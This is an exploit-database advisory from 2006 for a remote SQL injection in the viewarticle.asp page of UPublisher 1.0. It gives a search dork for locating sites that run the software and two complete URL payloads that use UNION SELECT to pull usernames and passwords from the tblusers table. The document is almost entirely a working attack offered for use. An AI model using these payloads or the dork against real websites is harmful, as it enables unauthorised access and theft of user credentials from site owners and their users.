25 lines
No EOL
666 B
Text
25 lines
No EOL
666 B
Text
*******************************************************************************
|
|
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
|
|
Vulnerability
|
|
# Author : ajann
|
|
# Dork : UPublisher
|
|
# Vendor: http://www.superfreaker.com/
|
|
|
|
|
|
*******************************************************************************
|
|
|
|
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
|
|
|
|
Example:
|
|
|
|
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
|
|
OR ---
|
|
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-11-12] |